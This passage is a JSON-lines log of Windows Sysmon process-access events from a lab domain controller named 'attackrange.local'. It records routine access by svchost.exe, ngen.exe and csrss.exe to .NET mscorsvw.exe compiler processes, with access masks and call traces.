{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001018FD0C00}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001018FD0C00}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.648\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001049E30B00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.648","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001049E30B00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.648\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001049E30B00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.648","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001049E30B00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001091010D00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001091010D00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.757\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001030050D00}\r\nTargetProcessId: 1804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.757","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001030050D00}","TargetProcessId":"1804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.757\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001030050D00}\r\nTargetProcessId: 1804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.757","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001030050D00}","TargetProcessId":"1804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.757\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001030050D00}\r\nTargetProcessId: 1804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.757","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001030050D00}","TargetProcessId":"1804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.960\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-0010E4E90B00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 